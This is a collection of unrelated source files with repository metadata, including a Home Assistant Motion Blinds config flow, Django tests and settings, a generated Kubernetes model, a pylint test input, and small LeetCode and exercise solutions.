9ce7c7e4717b87e49c329c52f811ca151af5949b
|
[] |
no_license
|
laveesingh/Competitive-Programming
|
3ce3272eab525635f9ce400f7467ee09de8b51df
|
41047f47c23bc8572a1891e891a03cc3f751e588
|
refs/heads/master
| 2021-01-24T09:51:00.332543 | 2017-10-30T17:11:48 | 2017-10-30T17:11:48 | 52,956,650 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 429 |
py
|
import random
def case():
q = random.randint(1,100000)
a = []
for i in xrange(random.randint(1,10000)):
a.extend([random.randint(1,30)]*random.randint(1,15))
n = len(a)
print n,q
for s in a: print s,
print
for i in xrange(q):
x = random.randint(1,n)
y = random.randint(x,n)
z = random.randint(1,6)
print x,y,z
t = 1
print t
for _ in xrange(t):
case()
|
[
"[email protected]"
] | |
bc515c0993495b2e5a539a3fda11dd20316f2e87
|
fe3265b72e691c6df8ecd936c25b6d48ac33b59a
|
/homeassistant/components/motion_blinds/config_flow.py
|
d861c989ee0e2c19d2a4eef6e23cd33e93f2c8c3
|
[
"Apache-2.0"
] |
permissive
|
bdraco/home-assistant
|
dcaf76c0967783a08eec30ce704e5e9603a2f0ca
|
bfa315be51371a1b63e04342a0b275a57ae148bd
|
refs/heads/dev
| 2023-08-16T10:39:15.479821 | 2023-02-21T22:38:50 | 2023-02-21T22:38:50 | 218,684,806 | 13 | 7 |
Apache-2.0
| 2023-02-21T23:40:57 | 2019-10-31T04:33:09 |
Python
|
UTF-8
|
Python
| false | false | 6,137 |
py
|
"""Config flow to configure Motion Blinds using their WLAN API."""
from __future__ import annotations
from typing import Any
from motionblinds import MotionDiscovery
import voluptuous as vol
from homeassistant import config_entries
from homeassistant.components import dhcp
from homeassistant.const import CONF_API_KEY, CONF_HOST
from homeassistant.core import callback
from homeassistant.data_entry_flow import FlowResult
from homeassistant.helpers.device_registry import format_mac
from .const import (
CONF_INTERFACE,
CONF_WAIT_FOR_PUSH,
DEFAULT_GATEWAY_NAME,
DEFAULT_INTERFACE,
DEFAULT_WAIT_FOR_PUSH,
DOMAIN,
)
from .gateway import ConnectMotionGateway
CONFIG_SCHEMA = vol.Schema(
{
vol.Optional(CONF_HOST): str,
}
)
class OptionsFlowHandler(config_entries.OptionsFlow):
"""Options for the component."""
def __init__(self, config_entry: config_entries.ConfigEntry) -> None:
"""Init object."""
self.config_entry = config_entry
async def async_step_init(
self, user_input: dict[str, Any] | None = None
) -> FlowResult:
"""Manage the options."""
errors: dict[str, str] = {}
if user_input is not None:
return self.async_create_entry(title="", data=user_input)
settings_schema = vol.Schema(
{
vol.Optional(
CONF_WAIT_FOR_PUSH,
default=self.config_entry.options.get(
CONF_WAIT_FOR_PUSH, DEFAULT_WAIT_FOR_PUSH
),
): bool,
}
)
return self.async_show_form(
step_id="init", data_schema=settings_schema, errors=errors
)
class MotionBlindsFlowHandler(config_entries.ConfigFlow, domain=DOMAIN):
"""Handle a Motion Blinds config flow."""
VERSION = 1
def __init__(self) -> None:
"""Initialize the Motion Blinds flow."""
self._host: str | None = None
self._ips: list[str] = []
self._config_settings = None
@staticmethod
@callback
def async_get_options_flow(
config_entry: config_entries.ConfigEntry,
) -> OptionsFlowHandler:
"""Get the options flow."""
return OptionsFlowHandler(config_entry)
async def async_step_dhcp(self, discovery_info: dhcp.DhcpServiceInfo) -> FlowResult:
"""Handle discovery via dhcp."""
mac_address = format_mac(discovery_info.macaddress).replace(":", "")
await self.async_set_unique_id(mac_address)
self._abort_if_unique_id_configured(updates={CONF_HOST: discovery_info.ip})
short_mac = mac_address[-6:].upper()
self.context["title_placeholders"] = {
"short_mac": short_mac,
"ip_address": discovery_info.ip,
}
self._host = discovery_info.ip
return await self.async_step_connect()
async def async_step_user(
self, user_input: dict[str, Any] | None = None
) -> FlowResult:
"""Handle a flow initialized by the user."""
errors = {}
if user_input is not None:
self._host = user_input.get(CONF_HOST)
if self._host is not None:
return await self.async_step_connect()
# Use MotionGateway discovery
discover_class = MotionDiscovery()
gateways = await self.hass.async_add_executor_job(discover_class.discover)
self._ips = list(gateways)
if len(self._ips) == 1:
self._host = self._ips[0]
return await self.async_step_connect()
if len(self._ips) > 1:
return await self.async_step_select()
errors["base"] = "discovery_error"
return self.async_show_form(
step_id="user", data_schema=CONFIG_SCHEMA, errors=errors
)
async def async_step_select(
self, user_input: dict[str, Any] | None = None
) -> FlowResult:
"""Handle multiple motion gateways found."""
if user_input is not None:
self._host = user_input["select_ip"]
return await self.async_step_connect()
select_schema = vol.Schema({vol.Required("select_ip"): vol.In(self._ips)})
return self.async_show_form(step_id="select", data_schema=select_schema)
async def async_step_connect(
self, user_input: dict[str, Any] | None = None
) -> FlowResult:
"""Connect to the Motion Gateway."""
errors: dict[str, str] = {}
if user_input is not None:
key = user_input[CONF_API_KEY]
connect_gateway_class = ConnectMotionGateway(self.hass)
if not await connect_gateway_class.async_connect_gateway(self._host, key):
return self.async_abort(reason="connection_error")
motion_gateway = connect_gateway_class.gateway_device
# check socket interface
check_multicast_class = ConnectMotionGateway(
self.hass, interface=DEFAULT_INTERFACE
)
multicast_interface = await check_multicast_class.async_check_interface(
self._host, key
)
mac_address = motion_gateway.mac
await self.async_set_unique_id(mac_address, raise_on_progress=False)
self._abort_if_unique_id_configured(
updates={
CONF_HOST: self._host,
CONF_API_KEY: key,
CONF_INTERFACE: multicast_interface,
}
)
return self.async_create_entry(
title=DEFAULT_GATEWAY_NAME,
data={
CONF_HOST: self._host,
CONF_API_KEY: key,
CONF_INTERFACE: multicast_interface,
},
)
self._config_settings = vol.Schema(
{
vol.Required(CONF_API_KEY): vol.All(str, vol.Length(min=16, max=16)),
}
)
return self.async_show_form(
step_id="connect", data_schema=self._config_settings, errors=errors
)
|
[
"[email protected]"
] | |
7138157a99f990cabe7b6d92c931997d3c4c9092
|
544cfadc742536618168fc80a5bd81a35a5f2c99
|
/tools/test/connectivity/acts_tests/acts_contrib/test_utils_tests/power/tel/lab/ensure_valid_calibration_table_test.py
|
76eb4dbd4acd38d244719fc813c3d683256c7892
|
[] |
no_license
|
ZYHGOD-1/Aosp11
|
0400619993b559bf4380db2da0addfa9cccd698d
|
78a61ca023cbf1a0cecfef8b97df2b274ac3a988
|
refs/heads/main
| 2023-04-21T20:13:54.629813 | 2021-05-22T05:28:21 | 2021-05-22T05:28:21 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,264 |
py
|
#!/usr/bin/env python3
#
# Copyright 2019 - The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from unittest import mock
import mobly.config_parser as mobly_config_parser
class EnsureValidCalibrationTableTest(unittest.TestCase):
""" Unit tests for exercising the logic of ensure_valid_calibration_table
for instances of PowerCellularLabBaseTest
"""
VALID_CALIBRATION_TABLE = {'1': {'2': {'3': 123, '4': 3.14}}, '2': 45.67}
INVALID_CALIBRATION_TABLE = {'1': {'a': 'invalid'}, '2': 1234}
@classmethod
    def setUpClass(cls):
        from acts_contrib.test_utils.power.cellular.cellular_power_base_test import PowerCellularLabBaseTest as PCBT
        cls.PCBT = PCBT
        PCBT.log = mock.Mock()
        PCBT.log_path = ''
def setUp(self):
self.tb_key = 'testbed_configs'
test_run_config = mobly_config_parser.TestRunConfig()
test_run_config.testbed_name = 'MockTestBed'
test_run_config.log_path = '/tmp'
test_run_config.summary_writer = mock.MagicMock()
test = self.PCBT(test_run_config)
self.test = test
def _assert_no_exception(self, func, *args, **kwargs):
try:
func(*args, **kwargs)
except Exception as e:
self.fail('Error thrown: {}'.format(e))
def _assert_calibration_table_passes(self, table):
self._assert_no_exception(self.test.ensure_valid_calibration_table, table)
def _assert_calibration_table_fails(self, table):
with self.assertRaises(TypeError):
self.test.ensure_valid_calibration_table(table)
def test_ensure_valid_calibration_table_passes_with_empty_table(self):
""" Ensure that empty calibration tables are invalid """
self._assert_calibration_table_passes({})
def test_ensure_valid_calibration_table_passes_with_valid_table(self):
""" Ensure that valid calibration tables throw no error """
self._assert_calibration_table_passes(self.VALID_CALIBRATION_TABLE)
def test_ensure_valid_calibration_table_fails_with_invalid_data(self):
""" Ensure that calibration tables with invalid entries throw an error """
self._assert_calibration_table_fails(self.INVALID_CALIBRATION_TABLE)
def test_ensure_valid_calibration_table_fails_with_none(self):
""" Ensure an exception is thrown if no calibration table is given """
self._assert_calibration_table_fails(None)
def test_ensure_valid_calibration_table_fails_with_invalid_type(self):
""" Ensure an exception is thrown if no calibration table is given """
self._assert_calibration_table_fails([])
if __name__ == '__main__':
unittest.main()
|
[
"[email protected]"
] | |
c406c4fa44ef9faa6c952d4cf2179d081e449de0
|
e1f5ae5fb62eac4cd87eac807e57321d895a6c48
|
/boards/tests/test_view_reply_topic.py
|
508a0a252fcdcb4c189740fe6b94398761a0d94b
|
[] |
no_license
|
Abepena/django-boards
|
5c1eebce615ff41e75a32cd46ec10228f0eff6c6
|
22aa237f9f19d04ddeb2284cd8f066563d6bc1b1
|
refs/heads/master
| 2020-03-24T22:08:54.894285 | 2018-08-10T16:29:39 | 2018-08-10T16:29:51 | 143,059,179 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,474 |
py
|
from django.test import TestCase
from django.contrib.auth.models import User
from django.urls import reverse, resolve
from ..models import Board, Topic, Post
from ..forms import PostForm
from ..views import reply_topic
class ReplyTopicTestCase(TestCase):
"""
Base Test for all other Test Cases with this page
The setUp will persist through all other Tests that inherit from this
"""
def setUp(self):
self.board = Board.objects.create(name="Django", description="Django Board")
self.username = 'john'
self.password = 'django123'
user = User.objects.create_user(username=self.username, email='[email protected]', password=self.password)
self.topic = Topic.objects.create(subject="Test", board=self.board, starter=user)
        self.post = Post.objects.create(message="Hello world!", topic=self.topic, created_by=user)
self.url = reverse('reply_topic', kwargs={"board_pk": self.board.pk, "topic_pk": self.topic.pk})
class LoginRequiredReplyTopicTest(ReplyTopicTestCase):
def test_redirection(self):
login_url = reverse('login')
response = self.client.get(self.url)
self.assertRedirects(response, f'{login_url}?next={self.url}')
class ReplyTopicTests(ReplyTopicTestCase):
def setUp(self):
super().setUp()
self.client.login(username=self.username, password=self.password)
self.response = self.client.get(self.url)
def test_response_status_code(self):
self.assertEqual(self.response.status_code, 200)
def test_view_function(self):
view = resolve('/boards/1/topics/1/reply/')
self.assertEqual(view.func, reply_topic)
def test_contains_form(self):
form = self.response.context.get("form")
self.assertIsInstance(form, PostForm)
def test_csrf(self):
self.assertContains(self.response, "csrfmiddlewaretoken")
def test_form_inputs(self):
"""
form should have 2 inputs, 1 hidden csrf 1 message
"""
self.assertContains(self.response, "<input", 1)
self.assertContains(self.response, "<textarea", 1)
class SuccessfulReplyTopicTests(ReplyTopicTestCase):
def setUp(self):
super().setUp()
self.client.login(username=self.username, password=self.password)
self.response = self.client.post(self.url, data={"message":"Hello"})
def test_redirection(self):
url = reverse('topic_posts', kwargs={
"board_pk": self.board.pk,
"topic_pk": self.topic.pk
})
        topic_posts_url = "{url}?page=1#2".format(url=url)
self.assertRedirects(self.response, topic_posts_url)
def test_reply_created(self):
"""
total posts created should be 2, one in the setup of the ReplyTopicTestCase
another in the data passed in within this TestCase
"""
        self.assertEqual(Post.objects.count(), 2)
class InvalidReplyTopicTests(ReplyTopicTestCase):
def setUp(self):
super().setUp()
self.client.login(username=self.username, password=self.password)
self.response = self.client.post(self.url, data={})
def test_response_status_code(self):
"""
Invalid data should just show the reply_topic view again and not redirect
"""
self.assertEqual(self.response.status_code, 200)
def test_form_errors(self):
form = self.response.context.get("form")
self.assertTrue(form.errors)
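# Usage sketch (assumes a standard Django project layout with a `boards` app):
#   python manage.py test boards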
|
[
"[email protected]"
] | |
3101499783426029239417ff8d62a287c447d05e
|
58a4e136b6759d9cc81a895dae6f536c6a125ecf
|
/poorsmantwitter/wsgi.py
|
92942c392dc65bd30a1716de81dcc46d4c255c6d
|
[] |
no_license
|
JohnnyFang/django-api-vuejs
|
d833866a1b86757ed7b6301984f70f39a1cadfae
|
80edc54740f46866cc938d1a5d190d71110711ad
|
refs/heads/master
| 2020-03-29T04:31:47.018835 | 2018-09-20T02:06:03 | 2018-09-20T02:06:03 | 149,535,361 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 407 |
py
|
"""
WSGI config for poorsmantwitter project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.1/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'poorsmantwitter.settings')
application = get_wsgi_application()
|
[
"[email protected]"
] | |
88fdacb8b8fd7a0424e1685a2102d2689d162abd
|
232b2e8881a4ba693bea940022d68cc22caeccbb
|
/virtual/lib/python3.6/site-packages/pylint/test/input/func_block_disable_msg.py
|
5ed690ebfd0ad61e819ce5be60262d24f8c1f576
|
[
"MIT"
] |
permissive
|
bryomajor/my-developer-life
|
b52ea3cd39e5d8226c51c700da32f5daf2489dc7
|
8332e1da4d24511255b1b7fc02f94ae4352f87a1
|
refs/heads/master
| 2022-12-08T08:18:40.266324 | 2019-10-29T13:40:44 | 2019-10-29T13:40:44 | 217,529,308 | 1 | 2 |
MIT
| 2022-12-08T06:47:28 | 2019-10-25T12:31:00 |
Python
|
UTF-8
|
Python
| false | false | 4,722 |
py
|
# pylint: disable=C0302,bare-except,print-statement
"""pylint option block-disable"""
from __future__ import print_function
class Foo(object):
"""block-disable test"""
def __init__(self):
self._test = "42"
def meth1(self, arg):
"""this issues a message"""
print(self)
def meth2(self, arg):
"""and this one not"""
# pylint: disable=W0613
print(self._test\
+ "foo")
def meth3(self):
"""test one line disabling"""
# no error
print(self.bla) # pylint: disable=E1101
# error
print(self.blop)
def meth4(self):
"""test re-enabling"""
# pylint: disable=E1101
# no error
print(self.bla)
print(self.blop)
# pylint: enable=E1101
# error
print(self.blip)
def meth5(self):
"""test IF sub-block re-enabling"""
# pylint: disable=E1101
# no error
print(self.bla)
if self.blop:
# pylint: enable=E1101
# error
print(self.blip)
else:
# no error
print(self.blip)
# no error
print(self.blip)
def meth6(self):
"""test TRY/EXCEPT sub-block re-enabling"""
# pylint: disable=E1101
# no error
print(self.bla)
try:
# pylint: enable=E1101
# error
print(self.blip)
except UndefinedName: # pylint: disable=E0602
# no error
print(self.blip)
# no error
print(self.blip)
def meth7(self):
"""test one line block opening disabling"""
if self.blop: # pylint: disable=E1101
# error
print(self.blip)
else:
# error
print(self.blip)
# error
print(self.blip)
def meth8(self):
"""test late disabling"""
# error
print(self.blip)
# pylint: disable=E1101
# no error
print(self.bla)
print(self.blop)
def meth9(self):
"""test re-enabling right after a block with whitespace"""
eris = 5
if eris: # pylint: disable=using-constant-test
print("In block")
# pylint: disable=E1101
# no error
print(self.bla)
print(self.blu)
# pylint: enable=E1101
# error
print(self.blip)
def meth10(self):
"""Test double disable"""
# pylint: disable=E1101
# no error
print(self.bla)
# pylint: disable=E1101
print(self.blu)
class ClassLevelMessage(object):
"""shouldn't display to much attributes/not enough methods messages
"""
# pylint: disable=R0902,R0903
def __init__(self):
self.attr1 = 1
self.attr2 = 1
self.attr3 = 1
self.attr4 = 1
self.attr5 = 1
self.attr6 = 1
self.attr7 = 1
self.attr8 = 1
self.attr9 = 1
self.attr0 = 1
def too_complex_but_thats_ok(self, attr1, attr2):
"""THIS Method has too much branches and returns but i don't care
"""
# pylint: disable=R0912,R0911
try:
attr3 = attr1+attr2
except ValueError:
attr3 = None
except:
return 'duh', self
if attr1:
for i in attr1:
if attr2:
return i
else:
return 'duh'
elif attr2:
for i in attr2:
if attr2:
return i
else:
return 'duh'
else:
for i in range(15):
if attr3:
return i
else:
return 'doh'
return None
print('hop, too many lines but i don\'t care')
|
[
"[email protected]"
] | |
618b82c84c0b4bb643b5a6a82e5c9447552a00b4
|
fd3b242c83a65edb85d3ad27c67172109fb5b0db
|
/venv/lib/python2.7/site-packages/kubernetes/client/models/v1_cinder_persistent_volume_source.py
|
73bcff8a2e312ac36248a78ca6ce04aeb15a998b
|
[] |
no_license
|
mainak90/hvac-openshift-feeder
|
a0946d89bd79e19881113effe3305499d80df4a8
|
730689dd7feca354fc09dabe3510333c9557e979
|
refs/heads/master
| 2020-12-08T07:39:58.125243 | 2020-04-26T19:49:40 | 2020-04-26T19:49:40 | 232,927,203 | 1 | 0 | null | 2020-01-09T23:45:08 | 2020-01-09T23:37:41 |
Python
|
UTF-8
|
Python
| false | false | 6,790 |
py
|
# coding: utf-8
"""
Kubernetes
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: v1.13.9
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class V1CinderPersistentVolumeSource(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'fs_type': 'str',
'read_only': 'bool',
'secret_ref': 'V1SecretReference',
'volume_id': 'str'
}
attribute_map = {
'fs_type': 'fsType',
'read_only': 'readOnly',
'secret_ref': 'secretRef',
'volume_id': 'volumeID'
}
def __init__(self, fs_type=None, read_only=None, secret_ref=None, volume_id=None):
"""
V1CinderPersistentVolumeSource - a model defined in Swagger
"""
self._fs_type = None
self._read_only = None
self._secret_ref = None
self._volume_id = None
self.discriminator = None
if fs_type is not None:
self.fs_type = fs_type
if read_only is not None:
self.read_only = read_only
if secret_ref is not None:
self.secret_ref = secret_ref
self.volume_id = volume_id
@property
def fs_type(self):
"""
Gets the fs_type of this V1CinderPersistentVolumeSource.
Filesystem type to mount. Must be a filesystem type supported by the host operating system. Examples: \"ext4\", \"xfs\", \"ntfs\". Implicitly inferred to be \"ext4\" if unspecified. More info: https://releases.k8s.io/HEAD/examples/mysql-cinder-pd/README.md
:return: The fs_type of this V1CinderPersistentVolumeSource.
:rtype: str
"""
return self._fs_type
@fs_type.setter
def fs_type(self, fs_type):
"""
Sets the fs_type of this V1CinderPersistentVolumeSource.
Filesystem type to mount. Must be a filesystem type supported by the host operating system. Examples: \"ext4\", \"xfs\", \"ntfs\". Implicitly inferred to be \"ext4\" if unspecified. More info: https://releases.k8s.io/HEAD/examples/mysql-cinder-pd/README.md
:param fs_type: The fs_type of this V1CinderPersistentVolumeSource.
:type: str
"""
self._fs_type = fs_type
@property
def read_only(self):
"""
Gets the read_only of this V1CinderPersistentVolumeSource.
Optional: Defaults to false (read/write). ReadOnly here will force the ReadOnly setting in VolumeMounts. More info: https://releases.k8s.io/HEAD/examples/mysql-cinder-pd/README.md
:return: The read_only of this V1CinderPersistentVolumeSource.
:rtype: bool
"""
return self._read_only
@read_only.setter
def read_only(self, read_only):
"""
Sets the read_only of this V1CinderPersistentVolumeSource.
Optional: Defaults to false (read/write). ReadOnly here will force the ReadOnly setting in VolumeMounts. More info: https://releases.k8s.io/HEAD/examples/mysql-cinder-pd/README.md
:param read_only: The read_only of this V1CinderPersistentVolumeSource.
:type: bool
"""
self._read_only = read_only
@property
def secret_ref(self):
"""
Gets the secret_ref of this V1CinderPersistentVolumeSource.
Optional: points to a secret object containing parameters used to connect to OpenStack.
:return: The secret_ref of this V1CinderPersistentVolumeSource.
:rtype: V1SecretReference
"""
return self._secret_ref
@secret_ref.setter
def secret_ref(self, secret_ref):
"""
Sets the secret_ref of this V1CinderPersistentVolumeSource.
Optional: points to a secret object containing parameters used to connect to OpenStack.
:param secret_ref: The secret_ref of this V1CinderPersistentVolumeSource.
:type: V1SecretReference
"""
self._secret_ref = secret_ref
@property
def volume_id(self):
"""
Gets the volume_id of this V1CinderPersistentVolumeSource.
volume id used to identify the volume in cinder More info: https://releases.k8s.io/HEAD/examples/mysql-cinder-pd/README.md
:return: The volume_id of this V1CinderPersistentVolumeSource.
:rtype: str
"""
return self._volume_id
@volume_id.setter
def volume_id(self, volume_id):
"""
Sets the volume_id of this V1CinderPersistentVolumeSource.
volume id used to identify the volume in cinder More info: https://releases.k8s.io/HEAD/examples/mysql-cinder-pd/README.md
:param volume_id: The volume_id of this V1CinderPersistentVolumeSource.
:type: str
"""
if volume_id is None:
raise ValueError("Invalid value for `volume_id`, must not be `None`")
self._volume_id = volume_id
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
if not isinstance(other, V1CinderPersistentVolumeSource):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
|
[
"[email protected]"
] | |
eeaecaef2aa86b78b91e226879df507b600fbaa2
|
e28009b0a4584e8d128ed6fbd4ba84a1db11d1b9
|
/724.Find Pivot Index/724.Find Pivot Index.py
|
e2f3a7351cebe7b37a64abc1530fec85170e3a81
|
[] |
no_license
|
jerrylance/LeetCode
|
509d16e4285296167feb51a80d6c382b3833405e
|
06ed3e9b27a3f1c0c517710d57fbbd794fd83e45
|
refs/heads/master
| 2020-12-02T23:10:27.382142 | 2020-08-02T02:03:54 | 2020-08-02T02:03:54 | 231,141,551 | 3 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,126 |
py
|
# LeetCode Solution
# Zeyu Liu
# 2019.3.25
# 724.Find Pivot Index
from typing import List
# method 1: slice-based traversal, extremely slow
class Solution:
def pivotIndex(self, nums: List[int]) -> int:
for i in range(len(nums)):
if sum(nums[:i]) == sum(nums[i+1:]):
return i
return -1
# transfer method
solve = Solution()
print(solve.pivotIndex([1, 7, 3, 6, 5, 6]))
# method 2 straightforward O(N) time O(1) space
class Solution:
def pivotIndex(self, nums: List[int]) -> int:
left = 0
right = sum(nums)
for i in range(len(nums)):
right -= nums[i]
if left == right:
return i
left += nums[i]
return -1
# transfer method
solve = Solution()
print(solve.pivotIndex([1, 7, 3, 6, 5, 6]))
# method 3: optimized version of method 1, still slow
class Solution:
def pivotIndex(self, nums: List[int]) -> int:
s = sum(nums) / 2
for i in range(len(nums)):
if sum(nums[:i])+nums[i]/2 == s:
return i
return -1
# transfer method
solve = Solution()
print(solve.pivotIndex([1, 7, 3, 6, 5, 6]))
|
[
"[email protected]"
] | |
a4339549ff121a3716ac714438184f983ddea0d6
|
33da2094a944e4333ea76b04c3c6078cf643b1dc
|
/tyler_crowdboticstest_155/settings.py
|
3d7ce2c30ec2503a84c8fca167abba0fe7ab3ab5
|
[] |
no_license
|
TylerCrowdboticsTest/tyler-crowdboticstest-155
|
3f72a9e63f63d827379bf709b2baf6b3776113e6
|
cc063c566acf36c353a4129ab21ff265d75fb163
|
refs/heads/master
| 2020-03-22T04:12:50.631988 | 2018-07-02T18:47:42 | 2018-07-02T18:47:42 | 139,481,489 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,143 |
py
|
"""
Django settings for tyler_crowdboticstest_155 project.
Generated by 'django-admin startproject' using Django 1.11.5.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '5sopo74xvgupkgmc&3=)f3p4nqs_78d8m+7^k5fsda@ll8y-04'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.sites'
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'tyler_crowdboticstest_155.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'tyler_crowdboticstest_155.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_URL = '/static/'
import environ
env = environ.Env()
ALLOWED_HOSTS = ['*']
SITE_ID = 1
MIDDLEWARE += ['whitenoise.middleware.WhiteNoiseMiddleware']
DATABASES = {
'default': env.db()
}
AUTHENTICATION_BACKENDS = (
'django.contrib.auth.backends.ModelBackend',
'allauth.account.auth_backends.AuthenticationBackend'
)
STATIC_ROOT = os.path.join(BASE_DIR, "staticfiles")
STATICFILES_DIRS = [
os.path.join(BASE_DIR, 'static')
]
STATICFILES_STORAGE = 'whitenoise.storage.CompressedManifestStaticFilesStorage'
LOCAL_APPS = [
'home',
]
THIRD_PARTY_APPS = [
'rest_framework',
'rest_framework.authtoken',
'bootstrap4',
'allauth',
'allauth.account',
'allauth.socialaccount',
'allauth.socialaccount.providers.google',
]
INSTALLED_APPS += LOCAL_APPS + THIRD_PARTY_APPS
# allauth
ACCOUNT_EMAIL_REQUIRED = True
ACCOUNT_AUTHENTICATION_METHOD = 'email'
ACCOUNT_USERNAME_REQUIRED = False
ACCOUNT_EMAIL_VERIFICATION = None
LOGIN_REDIRECT_URL = '/'
|
[
"[email protected]"
] | |
1c0a5d1b35fec3aea62c94f8bbf9b9c3a2720fbb
|
9719df2dc131aa1189acef7273bee090290becd6
|
/Chapter 11/E6.py
|
e4dd52107ac0dc81baf55df8f39f90d0cbb908ec
|
[
"MIT"
] |
permissive
|
hanzhi713/thinkcs-python3-solutions
|
df72e9d76779a5ffb9a8f9a9316c672a021feece
|
290b34df7d9c7f45daebd1af6017a03828ec8eb4
|
refs/heads/master
| 2020-03-31T10:03:03.301775 | 2018-10-08T17:41:10 | 2018-10-08T17:41:10 | 152,120,690 | 13 | 7 | null | null | null | null |
UTF-8
|
Python
| false | false | 137 |
py
|
def scalar_mult(s, v):
    """Multiply every element of vector v by the scalar s."""
    result = []
    for item in v:
        result.append(item * s)
    return result
print(scalar_mult(5, [1, 2]))
|
[
"[email protected]"
] | |
0f3add105d1072828de995c41fe4f79d5c9ec94f
|
4d330238c7eb97fac95f3674ab4ddb5114fdf3d7
|
/biosteam/units/auxiliary.py
|
f446902fd6363ba65c9a0adae2cd4ba9307fa988
|
[
"LicenseRef-scancode-unknown-license-reference",
"NCSA",
"MIT"
] |
permissive
|
BioSTEAMDevelopmentGroup/biosteam
|
d064c7d5a16d79a966caa68ed3f4cca089f9c49c
|
0501214b7e7fb16b89d1e45c94938b0e08b1331f
|
refs/heads/master
| 2023-08-20T04:47:10.816994 | 2023-08-12T19:22:20 | 2023-08-12T19:22:20 | 164,639,830 | 115 | 29 |
NOASSERTION
| 2023-06-10T15:56:37 | 2019-01-08T12:02:16 |
Python
|
UTF-8
|
Python
| false | false | 4,071 |
py
|
# -*- coding: utf-8 -*-
"""
This module contains functions for adding auxiliary unit operations.
"""
import biosteam as bst
__all__ = ('Auxiliary',)
class Auxiliary:
"""Abstract class for light-weight auxiliary unit. The class should
compute all results during initialization."""
__slots__ = (
'owner',
'auxname',
'auxiliary_units',
'power_utility',
'heat_utilities',
'baseline_purchase_costs',
'purchase_costs',
'installed_costs',
'F_M', 'F_D', 'F_P', 'F_BM',
)
add_power_utility = bst.Unit.add_power_utility
add_heat_utility = bst.Unit.add_heat_utility
create_heat_utility = bst.Unit.create_heat_utility
def __init__(self):
self.power_utility = bst.PowerUtility()
self.heat_utilities = []
self.baseline_purchase_costs = {}
self.purchase_costs = {}
